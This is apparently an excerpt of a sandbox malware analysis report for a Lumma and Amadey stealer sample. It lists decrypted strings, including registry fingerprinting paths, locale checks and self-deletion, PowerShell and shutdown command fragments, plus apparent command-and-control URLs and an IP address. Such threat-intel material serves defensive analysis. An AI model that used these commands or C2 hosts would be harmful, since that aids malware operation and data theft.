Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ------
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ?scr=1
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ComputerName
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -unicode-
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: VideoID
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProductName
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: CurrentBuild
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32.exe
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: "taskkill /f /im "
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && timeout 1 && del
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: && Exit"
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && ren
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Powershell.exe
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shutdown -s -t 0
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: random
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Keyboard Layout\Preload
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 00000419
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 00000422
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 00000423
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 0000043f
Source: 13.2.958e367d97.exe.340000.0.unpack	String decryptor: cocjkoonpillow.today/bVzx
Source: 13.2.958e367d97.exe.340000.0.unpack	String decryptor: featureccus.shop/bdMAn
Source: 13.2.958e367d97.exe.340000.0.unpack	String decryptor: mrodularmall.top/aNzS
Source: 13.2.958e367d97.exe.340000.0.unpack	String decryptor: jowinjoinery.icu/bdWUa
Source: 13.2.958e367d97.exe.340000.0.unpack	String decryptor: legenassedk.top/bdpWO
Source: 13.2.958e367d97.exe.340000.0.unpack	String decryptor: htardwarehu.icu/Sbdsa
Source: 13.2.958e367d97.exe.340000.0.unpack	String decryptor: cjlaspcorne.icu/DbIps
Source: 13.2.958e367d97.exe.340000.0.unpack	String decryptor: bugildbett.top/bAuz

Source: Malware configuration extractor	URLs: cocjkoonpillow.today/bVzx
Source: Malware configuration extractor	URLs: featureccus.shop/bdMAn
Source: Malware configuration extractor	URLs: mrodularmall.top/aNzS
Source: Malware configuration extractor	URLs: jowinjoinery.icu/bdWUa
Source: Malware configuration extractor	URLs: legenassedk.top/bdpWO
Source: Malware configuration extractor	URLs: htardwarehu.icu/Sbdsa
Source: Malware configuration extractor	URLs: cjlaspcorne.icu/DbIps
Source: Malware configuration extractor	URLs: bugildbett.top/bAuz
Source: Malware configuration extractor	IPs: 176.113.115.6

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report L0erlgyZ6f.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
L0erlgyZ6f.exe